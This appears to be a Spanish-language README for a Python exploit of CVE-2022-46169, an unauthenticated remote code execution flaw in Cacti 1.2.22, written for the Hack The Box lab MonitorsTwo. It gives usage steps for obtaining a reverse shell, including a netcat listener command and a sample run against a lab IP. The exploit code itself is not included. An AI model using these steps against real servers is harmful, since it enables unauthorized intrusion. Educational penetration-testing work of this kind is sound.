
Exploit en Python para CVE-2022-46169 que entrega ejecución remota de código no autenticada en Cacti 1.2.22 mediante reverse shell, destinado a pruebas de penetración educativas.
Este repositorio contiene un exploit para CVE-2022-46169, que afecta a Cacti 1.2.22. Esta vulnerabilidad permite a un atacante no autenticado ejecutar código arbitrario en el sistema afectado.
Si desea un análisis detallado de cómo es posible este exploit, consulte la publicación de Rapid7 aquí. Allí se detallan a fondo los aspectos específicos.
Escribí este código, con ayuda de chatGPT, para una máquina de Hack The Box llamada MonitorsTwo con fines educativos.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Configure un listener en su máquina local con netcat nc -lvnp 9001
Ejecute el exploit contra el objetivo
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
Esta Prueba de Concepto (PoC) está destinada estrictamente a fines educativos y de prueba. Ejecutar esta PoC en cualquier sistema o red sin la autorización clara del propietario del sistema es ilegal y puede dar lugar a acciones legales. El creador no acepta ninguna responsabilidad por cualquier daño derivado del uso correcto o incorrecto de esta PoC. Úsela bajo su propio riesgo.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/